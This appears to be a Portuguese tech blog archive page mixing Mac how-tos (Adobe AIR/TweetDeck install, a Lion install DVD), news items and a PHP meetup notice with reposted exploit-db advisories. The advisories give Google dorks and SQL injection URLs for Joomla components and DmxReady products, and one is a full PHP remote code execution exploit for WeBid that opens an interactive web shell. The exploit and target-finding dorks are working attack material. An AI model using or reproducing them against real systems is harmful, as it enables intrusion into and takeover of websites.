Como instalar Adobe Air mais recente + TweetDeck no Mac Os X Lion

Standard

É bem verdade que com os recursos do Flex dá para ser feito um monte de coisas bacanas. Muitos já devem conhecer a ferramenta TweetDeck (a qual já até citamos em outro post, porém para Android, caso queira companhar basta clicar no top 2011 aplicativos para android). Neste post iremos mostrar como instalar de forma ultra blaster simples o Adobe Air e em seguida como instalar o TweetDeck. Os passos são simples e foram feitos literalmente em um sistema operacional Mac Os X Lion.

Como instalar Adobe Air no Mac Os X?

Vamos lá!

Primeiro passo que devemos fazer é acessar o site da adobe para baixar o pacote oficial direto do site. Usamos uma simples tática, entrando no site da Google e colocando Download Adobe Air. O Site em si, assim que clicado pela url fornecida ao google já checa os cabeçalhos e de cara lhe redireciona para o Link de download para Osx, ou seja, arquivo de download vem no formato DMG.

Se você quiser o Link que usamos (talvez, daqui alguns dias, com os próximos releases este já poderá não estar mais acessível. Caso ainda assim queira:

http://get.adobe.com/br/air/thankyou/?installer=Adobe_AIR_2.7.1_for_MacOS_X

buscando pela google o adobe air

buscando pela google o adobe air

Veja que estamos mostrando literalmente como fizemos via texto ou por imagem (há quem afirme que uma imagem fala mais que mil palavras 😛 ).

Acessando o download na Adobe

Acessando o download na Adobe

Perceba que clicando no link da adobe de download ele cai na página acima. Quando clicamos em download o redirecionamento vai para o link que citamos que pode perder sua validade (ele se basea no versionamento e não no nome canonical de download adobe air for mac, por exemplo).

Salvando o formato DMG no disco

Salvando o formato DMG no disco

Esta parte já começa a fircar interessante. Como podem perceber estamos baixando o Adobe Air em formato DMG para o disco.

Confirmando a execução do adobe air install

Confirmando a execução do adobe air install

Agora iremos confirmar a instalação do Adobe Air.

Confirmando a instalação do adobe air

Confirmando a instalação do adobe air

Devemos dizer que iremos abrir o arquivo baixado.

Ideal mesmo é que abramos a pasta aonde ele foi salvo no download e cliquemos em cima do arquivo dmg para rodar logo o instalador.

Abrindo o dmg do adobe air install

Abrindo o dmg do adobe air install

Veja que ao abrir o dmg ele mostra literalmente o instalador do adobe air, devemos prosseguir clicando duas vezes sobre este arquivo vermelhinho para o instalador começar a rodar.

Confirmando a execução do arquivo web adobe air install

Confirmando a execução do arquivo web adobe air install

Confirmando a execução iremos para a tela a seguir:

Confirmar instalação do adobe air

Confirmar instalação do adobe air

Veja que no meu caso havia uma versão bem ultrapassada do adobe air instalada, nesta hora ele pede confirmação para ATUALIZAR, se este for seu caso, basta seguir, do contrário, se não havia adobe air ele sugere instalar. No passo da aceitação ele segue literalmente padronizado, dizendo instalar ou atualizar o resto é idêntico. Devemos confirmar aceitando a instalação/atualização.

Autorize a instalação com seu login e senha mestra

Autorize a instalação com seu login e senha mestra

Autorizando com nosso usuário e senha iremos prosseguir com a instalação.

Progresso da instalação do adobe air no mac os x lion

Progresso da instalação do adobe air no mac os x lion

Veja acima o progresso da instalação ocorrendo tranquilamente.

Finalizando a instalação do adobe air

Finalizando a instalação do adobe air

Agora finalizamos a instalação do adobe air.

Como instalar o TweetDeck?

Vamos lá!

Buscando o TweetDeck

Buscando o TweetDeck

Agora iremos instalar o TweetDeck de forma tranquila.

A forma mais eficaz é fazer igual fizemos acima. Acessando o GOOGLE e escrevendo TweetDeck automaticamente temos o site oficial.

Caso queira acessar direto não perca tempo :P, clique aqui -> http://www.tweetdeck.com/desktop/

Se clicar no link acima já caímos na parte que nos interessa, do contrário acessaremos o site do tweetdeck e teremos de clicar em desktop, veja as 2 fotos:

Site Oficial do TweetDeck

Site Oficial do TweetDeck

TweetDeck para Desktop

TweetDeck para Desktop

Veja que o tweetdeck é uma ferramenta oficial do Twitter, por isso tranquilizesse quanto ao seu uso. (milhares de users aprovam 😛 )
Clicando no link de download do site iremos instalar tranquilamente o TweetDeck, veja a imagem abaixo:

Clique em Download NOW

Clique em Download NOW

Clicando em Download now ele automaticamente utiliza recursos do adobe air instalado em seu desktop. Assim que chamamos clicando ele automaticamente prepara o download e instalação, veja:

Preparando a instalação do TweetDeck 2011

Preparando a instalação do TweetDeck 2011

Vamos dando prosseguimento:

Instalando o TweetDeck confirmando

Instalando o TweetDeck confirmando

Agora iremos prosseguir novamente. Confirme a instalação avançando mais esta etapa acima.

Progresso do TweetDeck

Progresso do TweetDeck

Os passos acima confirmam o download do tweetdeck via adobe air. Agora iremos finalizar a instalação do mesmo seguindo as imagens abaixo:

Confirmando instalação no disco

Confirmando instalação no disco

Vamos encerrar isso ou não? Veja os passos abaixo:

Concluindo a instalação do tweetdeck

Concluindo a instalação do tweetdeck

Pronto. Assim que concluir ele já vai pedir para autorizar o Tweetdeck pois foi baixado da internet (confirme imagem abaixo):

devemos abrir o tweetdeck

devemos abrir o tweetdeck

 

Pronto.

Veja aonde o danado fica no menu:

menu com tweetdeck (aplicativos)

menu com tweetdeck (aplicativos)

Gostou? Salvou seu dia? Então comente este artigo!

Achou massa? Compartilhe!

Se não gostou também critique.

Atenciosamente

4PPUN1X (l4b m41s p1r4d0 de T1).

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Standard


=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \ / /____ | | / _ | __ ______ | |/ __ |
___/ > < | |_> > |_( ) || | /_____/ | / /_/ |
___ >__/_ | __/|____/____/|__||__| |______ |
/ /|__| /
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I’m Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####

[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ …others |
============================================================================================ |

Fonte: http://www.exploit-db.com/exploits/17603/

Como criar um DVD de instalação do Mac OS X Lion

Standard

Olá galera tudo na paz?

Depois de algum tempo sem postar nada de importante por aqui hoje venho postar sobre um assunto que está no foco de todas as notícias…

Mac OS X Lion, despois que a Apple resolveu dificultar a vida dos hackintoshers de platão lançando Upgrade através de sua loja virtual AppStore… ficamos a nos perguntar: E se eu precisar (diga-se querer) ter um DVD em mãos pra qualquer emergência, como fazer?

Segundo nossa querida apple caso você queira fazer uma instalação “Limpa” você precisa fazer um formatação com o Snow Leopard subir até a versão 10.6.6 e só depois acessar a AppStore e baixar o Lion e fazer uma instalação por cima….. Nesse ponto fiquei meio chateado com a Apple que tanto bato palmas para suas decisões na tangente do Mac OS X… mas vamos lá…. Vou mostrar a vocês como criar um DVD bootável de Instalação do Mac OS X Lion… Esse how to é baseado em um texto de JulioPW publicado no fórum do pessoal do HMBT… foi feito por ele e testado e comprovado por mim com algumas modificações (desculpem me por não ter mais o link do artigo original, caso tenha é só me mandar por comentário que coloco aqui no artigo) será necessário:

→Você precisará do .app baixado diretamente da AppStore Aqui

→Um Mac verdadeiro ou Hackintosh rodando Mac OS X Snow Leopard (poderia indicar o Leopard, mas como acredito que nossos leitores estão sempre atualizados vou indicar o Snow Leopard)

→ 15 ou 20 minutos pra ler e colocar esse how to em prática

 

Vamos lá…

Primeiro vá até o Utilitário de Disco do Mac, Ir/Utilitários

DVD_Lion

 

Agora entre no Utilitário de Disco

DVD_Lion2

 

Na parte superior do Utilitário de Disco Clique em Nova Imagem

DVD_Lion3

 

Na tela que aparecerá, aletere como desejar os campos Salvar Como, Onde e Nome; o restante deixe como na imagem….

DVD_Lion4

 

Verá o processo se seguindo

DVD_Lion5

 

Execute até o local onde salvou o DMG e o execute….

DVD_Lion6

 

Agora vamos usar o ShowAllFiles para mostrar os arquivos ocultos dentro de nosso .app, baixe-o aqui

http://dl.dropbox.com/u/7022385/ShowAllFiles.zip

 

Execute-o, clique em Show

DVD_Lion7

 

Agora vá até seu .app baixado da AppStore (o arquivo vem com nome original de Lion Installer e fica originalmente na pasta Aplicativos, eu preferi mudá-lo por uma questão de organização pessoal), clique com o botão direito ou clique secundário e vá em Mostrar Conteúdo do Pacote

DVD_Lion8

 

Entre em Contents/ SharedSupport

DVD_Lion9

 

Execute o InstallESD.dmg

DVD_Lion11

 

Chegará a uma tela assim

DVD_Lion12

 

Pra adiantar as coisas, execute o BaseSystem.dmg

DVD_Lion13

 

Em sua Mesa deverá ter os ícones dos .dmg que montamos até agora…

DVD_Lion14

 

Voltem ao Utilitário de Disco, seu painel da esquerda será mais ou menos assim

DVD_Lion15

 

Dentro do Utilitário de Disco clique no botão Restaurar

DVD_Lion16

 

Em fonte arraste Mac OS X Base System, e em destino arraste aquele DMG vazio que você criou e montou posteriormente na Mesa… Ficando assim (dependendo somente do nome que você deu ao seu .dmg)

DVD_Lion17

 

Agora clique em Restaurar no canto inferior direito

DVD_Lion18

 

Será notificado, clique em Apagar

DVD_Lion19

 

Pediram sua senha (santo sistema de permissões…. é por isso que sou apaixonado por sistema Unix-Like)

DVD_Lion20

 

Demorará em torno de 7 minutos até que essa restauração termine, veja um pouco do processo

DVD_Lion21

 

Agora amigos vá até o disco Mac OS X Install ESD que está na Mesa (Área de Trabalho)

DVD_Lion22

 

Agora copie a pasta Packages para a área de transferência (Command+C)

DVD_Lion23

 

Agora vá no Disco que criamos para que restaurássemos os arquivos necessários e coloque a pasta Packages que acabamos de colocar na área de transferência… Mas Doooguinha como vou saber qual o disco correto para a cópia dos arquivos, existem 2 discos em minha mesa com o mesmo nome…

-Galera, para facilitar na identificação clique com o botão direito ou clique secundário no Disco que deseja tirar suas dúvidas e clique Obter Informações

DVD_Lion24

 

Verão

DVD_Lion25

 

Podem ver que acertamos de prima o disco correto, se não for o seu caso teste com o outro disco montado….  Agora entre na pasta System/Installation

DVD_Lion26

 

Exclua o atalho para a pasta Packages que ali se encontra

DVD_Lion27

 

Agora pessoal, lembram-se daquela pastinha chamada Packages que copiamos do Mac OS X Intall ESD? Isso mesmo que você mais espertinho gritou ai… ela vem pra cá….

DVD_Lion28

 

Pronto galera, agora é só esperar terminar a cópia dessa pasta e partir para o abraço…. quero dizer ao terminar a cópia vamos gravar isso em disco……

Isso pode ser feito usando esse how to

http://www.appunix.com.br/howto/mac-os/como-gravar-iso-no-mac-os-x-sem-software/

levando se em conta apenas que usará agora um .dmg e não um .iso ….

É isso galera, espero que ajude aos tantos usuários Mac e Hackintoshs que tem procurado isso a cada dia em nosso amigo google…. Podem perceber que esse how to é muito parecido com o how to sobre criar um pendrive bootável do Mac OS X Lion que publiquei a alguns dias…. Abraço a todos…..

Obs:Pode ser usado tanto em Hackintohs (com o devido CdBoot) quando em Macs verdadeiros para realizar realmente uma instalação limpa (coisa que nossa querida Apple não quer deixar)….

Aproveitem….

Gostou? Comente, complemente e espalhe!

 

Mac OS X Lion Lançado

Standard

Para todos que estvam anciosos (inclusive eu) já está disponível para download na AppStore nosso querido Mac OS X Lion…. Acabam -se os rumores… agora é certo… olhem as imagens… agora é só pagar pelo upgrade…. Muito ancioso, pois a versão GM já estava muito estável e me atendeu em praticamente todos os quesitos…

Lion_0

Lion

Lion_1

Basta abrir o AppStore e verá o Rei dos Sistemas operacionais… bem simples, rápido e fácil (upgrade)….. Obrigado Jobs….

Abraço a todos…

Segundo desenvolvedores: Amazon App Store é um "desastre"

Standard

Segundo a nota, a idéia e mostrar o jogo da Amazon por trás da App Store dela.

“The developer of the current #2 Top App on Android Market has written a very interesting article giving six reasons why they decided to pull their game from Amazon Appstore. From the article: ‘If you are a small indie development team, or possibly even alone, don’t bother with Amazon Appstore. Create a great app, publish it on Android Market, and provide great customer support. You will never succeed on Amazon Appstore without a big wallet, or at least an established reputation so that Amazon puts value behind their promises.'”

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

Standard

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_faqsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=faqs-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

———————————————————————————————————
Bug;

http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK]

DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Exploit Title:DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_contactusmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=contact-us-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK]

DMXReady Registration Manager v1.2 SQL Injection Vulneratbility

# Exploit Title: DMXReady Registration Manager v1.2 SQL Injection
Vulneratbility
# Google Dork: inurl:inc_registrationmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=registration-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/RegistrationManager/update.asp?MemberID=xx [ SQL

# Exploit Title: DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility
# Google Dork: inurl:inc_catalogmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=catalog-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————————————-
Bug details;

http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK]

DmxReady News Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady News Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_newsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=news-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-
Bug ;

http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK]

Fontes: http://www.exploit-db.com/exploits/17480/
http://www.exploit-db.com/exploits/17479/
http://www.exploit-db.com/exploits/17478/
http://www.exploit-db.com/exploits/17475/
http://www.exploit-db.com/exploits/17475/

WeBid

Standard

/*

------------------------------------------------------------
WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.webidsupport.com/

This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

[-] Vulnerable code to SQL injection in feedback.php:

154. $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";
155. $res = mysql_query($query);
156. $system->check_mysql($res, $query, __LINE__, __FILE__);
157. $item_title = mysql_result($res, 0, 'title');

Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:

21. if (isset($_COOKIE['WEBID_RM_ID']))
22. {
23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";
24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
25. setcookie('WEBID_RM_ID', '', time() - 3600);
26. }

Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:

84. if (isset($_COOKIE['WEBID_ONLINE']))
85. {
86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";
87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
88. }

Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.

[-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

61. function buildcache($newaarray)
62. {
63. global $include_path;
64.
65. $output_filename = $include_path . 'currencies.php';
66. $output = " 67. $output.= "$conversionarray[] = '" . time() . "';n";
68. $output.= "$conversionarray[] = array(n";
69.
70. for ($i = 0; $i < count($newaarray); $i++)
71. {
72. $output .= "t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";
73. if ($i < (count($newaarray) - 1))
74. {
75. $output .= ",n";
76. }
77. else
78. {
79. $output .= "n";
80. }
81. }
82.
83. $output .= ");n?>n";
84.
85. $handle = fopen($output_filename, 'w');
86. fputs($handle, $output);
87. fclose($handle);
88. }

Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being
written to currencies.php file, this can lead to arbitrary PHP code injection.

[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

18. if (isset($_GET['lan']) && !empty($_GET['lan']))
19. {
20. if ($user->logged_in)
21. {
22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];
23. }
24. else
25. {
26. // Set language cookie
27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');
28. }
29. $language = $_GET['lan'];
30. }
31. elseif ($user->logged_in)
32. {
33. $language = $user->user_data['language'];
34. }
35. elseif (isset($_COOKIE['USERLANGUAGE']))
36. {
37. $language = $_COOKIE['USERLANGUAGE'];
38. }
39. else
40. {
41. $language = $system->SETTINGS['defaultlanguage'];
42. }
43.
44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];
45.
46. include $main_path . 'language/' . $language . '/messages.inc.php';

Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before

being used to include files on line 46. This can be exploited to include arbitrary local files.

[-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log

[-] Disclosure timeline:

[19/06/2011] - Vulnerabilities discovered
[19/06/2011] - Vendor contacted
[20/06/2011] - Vendor contacted again
[21/06/2011] - No response from vendor
[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34
[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1
[22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892
[04/07/2011] - Public disclosure

*/

error_reporting(E_ERROR);
set_time_limit(0);

if (!extension_loaded("curl")) die("cURL extension requiredn");

$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

function http_post($page, $data)
{
global $ch, $url;

curl_setopt($ch, CURLOPT_URL, $url.$page);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

return curl_exec($ch);
}

print "n+----------------------------------------------------------------------+";
print "n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";
print "n+----------------------------------------------------------------------+n";

if ($argc < 2)
{
print "nUsage......: php $argv[0] n";
print "nExample....: php $argv[0] https://localhost/";
print "nExample....: php $argv[0] http://localhost/webid/n";
die();
}

$url = $argv[1];

$code = rawurlencode("'));print('_code_');passthru(base64_decode($_POST['c'])//");
http_post("converter.php", "action=convert&from=USD&to={$code}");

while(1)
{
print "nwebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("n[-] Exploit failedn");
}
?>

Fonte: http://www.exploit-db.com/exploits/17487/

Joomla mdigg Component SQL Injection Vulnerability

Standard

=====================================================================

.__         .__  __            .__    .___
____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \  /  /____ |  |  /  _ |     __  ______ |  |/ __ |
  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
___  >__/_ |   __/|____/____/|__||__|           |______ |
/      /|__|                                          /
Exploit-ID is the Exploit Information Disclosure
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####
[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others                                                                              |

============================================================================================ |

 

Fonte: http://www.exploit-db.com/exploits/17464/

Evento: II encontro PHP-PB

Standard

O que é?

O segundo encontro do grupo de desenvolvedores PHP da Paraíba tem como objetivo reunir os membros do grupo, estudantes e profissionais da área de TI para troca de conhecimentos na tecnologia PHP e relacionadas. O encontro contará com palestras e momentos de networking entre os participantes.

Se você não participou do primeiro enconto, veja como foi:

* Fotos
* Apresentações

Quando?

Dia 07 de Março de 2009, a partir das 8 da manhã na Unipê, localizada na BR-230, bairro Água Fria em João Pessoa.
Unipê

Quer patrocinar?

Faça já o download do nosso plano de patrocínio e entre em contato conosco!

Inscrições

A participação no evento é gratuita, porém é necessária a prévia inscrição e a doação de 1Kg de alimento não perecível no dia do evento.

A doação será repassada à Casa da Criança com Câncer, instituição filantrópica que dá apoio aos pacientes e familiares vindos do interior em busca de tratamento no Hospital do Câncer Napoleão Laureano.

Os membros inscritos e presentes no dia do evento concorrerão a diversos brindes como livros da editora O’Reilly, camisetas, um elePHPant de pelúcia e muito mais!

Já contamos com 378 inscritos no total, sendo 1 só nas últimas 24 horas!

Inscreva-se AQUI!

Fonte: http://www.littleoak.com.br/2009/02/22/ii-encontro-php-pb/

II encontro PHP-PB

Standard

O que é?

O segundo encontro do grupo de desenvolvedores PHP da Paraíba tem como objetivo reunir os membros do grupo, estudantes e profissionais da área de TI para troca de conhecimentos na tecnologia PHP e relacionadas. O encontro contará com palestras e momentos de networking entre os participantes.

Se você não participou do primeiro enconto, veja como foi:

* Fotos
* Apresentações

Quando?

Dia 07 de Março de 2009, a partir das 8 da manhã na Unipê, localizada na BR-230, bairro Água Fria em João Pessoa.
Unipê

Quer patrocinar?

Faça já o download do nosso plano de patrocínio e entre em contato conosco!

Inscrições

A participação no evento é gratuita, porém é necessária a prévia inscrição e a doação de 1Kg de alimento não perecível no dia do evento.

A doação será repassada à Casa da Criança com Câncer, instituição filantrópica que dá apoio aos pacientes e familiares vindos do interior em busca de tratamento no Hospital do Câncer Napoleão Laureano.

Os membros inscritos e presentes no dia do evento concorrerão a diversos brindes como livros da editora O’Reilly, camisetas, um elePHPant de pelúcia e muito mais!

Já contamos com 378 inscritos no total, sendo 1 só nas últimas 24 horas!

Inscreva-se AQUI!